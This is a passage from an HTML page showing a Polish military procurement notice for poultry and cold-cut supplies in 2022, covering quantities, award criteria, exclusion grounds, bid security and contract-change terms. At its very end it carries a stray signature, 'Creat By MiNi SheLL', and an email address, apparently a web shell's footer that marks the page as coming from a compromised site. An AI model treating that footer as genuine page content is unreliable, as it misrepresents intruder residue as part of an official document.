kurczaka kg 75 75 75 75 300<br/>9. Wątroba z kurczaka kg 95 95 95 95 380<br/>10. Żołądki kurczaka kg 95 95 95 95 380<br/>11. Kabanosy drobiowe kg 200 200 200 200 800<br/>12. Kiełbasa szynkowa drobiowa kg 210 210 210 210 840<br/>13. Parówki z fileta z kurczaka kg 200 200 200 200 800<br/>14. Szynka drobiowa kg 210 210 210 210 840<br/>15. Szynka z indyka kg 210 210 210 210 840<br/>16. Mortadela drobiowa kg 175 175 175 175 700<br/>Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Szczegółowe ilości maksymalne zostały określone w Opisie Przedmiotu Zamówienia i Formularzu Cenowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15112000-6 - Drób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-02 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant dostaw - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2<br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant dostaw”<br/><br/>3. W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/>najniższa oferowana cena brutto dla ilości minimalnych<br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/>cena brutto dla ilości minimalnych oferty badanej<br/><br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>• 0 pkt za WARIANT I – dostawy w każdy wtorek i czwartek(w przypadku, gdy<br/>w ww. dzień wypada dzień świąteczny dostawa w poprzednim dniu roboczym)<br/>• 20 pkt za WARIANT II – dostawy w każdy poniedziałek, środa i piątek<br/>(w przypadku, gdy w ww. dzień wypada dzień świąteczny dostawa w poprzednim dniu roboczym)<br/>• 40 pkt za WARIANT III – dostawy w każdy poniedziałek, wtorek, czwartek<br/>i piątek (w przypadku, gdy w ww. dzień wypada dzień świąteczny dostawa<br/>w poprzednim dniu roboczym)<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>1) Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>2) W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT I, w związku z tym otrzyma 0 pkt.<br/>3) Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty;<br/>4) Dostawy do magazynów Zamawiającego w godz. 8:00-13:30, w piątek 8:00-12:00.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestracji lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 1 pkt 1), dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej<br/>w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 pkt 2), zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony odpowiednio jak w terminie wskazanym w ust. 1 pkt 2).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W przypadku, jeżeli Wykonawca przewiduje zastosowanie rozwiązań równoważnych, Zamawiający wymaga złożenia wraz z ofertą środków dowodowych, jakimi Wykonawca udowodni, że oferowane rozwiązanie jest równoważne rozwiązaniom opisanym w SWZ. Zamawiający nie ogranicza rodzaju tych środków dowodowych. W szczególności mogą to być wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 niniejszej SWZ.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający nie ogranicza rodzaju przedmiotowych środków dowodowych. W szczególności mogą to być wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>a) dla części zamówienia nr 1 – 3 750,00 PLN;<br/>b) dla części zamówienia nr 2 – 1 150,00 PLN. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp potwierdzającego brak podstaw wykluczenia na podstawie art. 108 ust 1 oraz art. 109 ust 1 pkt 4), 5), 7) ustawy Pzp - składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje wprowadzenie zmian postanowień umowy dotyczące:<br/>1) zmiany ilości i częstotliwości dostaw w stosunku do wcześniej złożonych zamówień w przypadkach, których nie można było przewidzieć w dniu zawarcia umowy,<br/>(w szczególności zmiany stanów osobowych, restrukturyzacji Sił Zbrojnych, zmiany obowiązujących aktów prawnych w zakresie uprawnień do wyżywienia żołnierzy). Wartością końcową umowy będzie wówczas wartość faktycznie zrealizowanych dostaw, z zastrzeżeniem, że wartość umowy nie może być mniejsza od kwoty określonej w § 2 ust. 4 i nie przekroczy kwoty określonej w § 2 ust. 2 (odpowiednio od części zamówienia).<br/>2) zmiany w ilości środków spożywczych dostarczanych do wskazanego miejsca odbioru (zmniejszenie lub zwiększenie), zmianę danego środka spożywczego dla wskazanego miejsca odbioru na inny, który nie był przewidziany dla tego miejsca, lecz jest objęty umową, z zastrzeżeniem, że cena całej umowy, wynikająca z jej postanowień nie może ulec zwiększeniu. O zmianie tej Zamawiający poinformuje Wykonawcę, z co najmniej 7 dniowym wyprzedzeniem podając zakres zmian,<br/>a Wykonawca zobowiązany jest do przyjęcia powyższego do realizacji. Jeżeli wystąpi znaczna liczba zmian – nie później niż do 10 każdego następnego miesiąca Zamawiający dokona analizy realizacji umowy w związku ze zmianami i opracuje<br/>w tym zakresie aneks do umowy.<br/>3) zmiany wysokości wynagrodzenia w sytuacji, gdy nastąpi urzędowa zmiana stawki podatku VAT.<br/>4) zmiana sposobu spełniania świadczeń w sytuacji, gdy nastąpi zmiana przepisów prawnych mających wpływ na wykonanie przedmiotu zamówienia.<br/>5) wystąpi konieczność zmiany umowy na podstawie art. 455 ustawy Pzp.<br/>6) Zamawiający przewiduje zmiany umowy wynikające z art. 15r Ustawy<br/>z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-07 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-05</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagany termin wykonania zamówienia:<br/>• dla części zamówienia nr 1 – od daty zawarcia umowy, jednak nie wcześniej<br/>niż od dnia 02.01.2022 r. do dnia 31.12.2022 r.;<br/>• dla części zamówienia nr 2 – od daty zawarcia umowy, jednak nie wcześniej<br/>niż od dnia 02.01.2022 r. do dnia 31.12.2022 r.;<br/><br/>Zamówienie zostało ujęte w Projekcie planu postępowań 21 Wojskowego Oddziału Gospodarczego na 2022 rok.

Creat By MiNi SheLL
Email: jattceo@gmail.com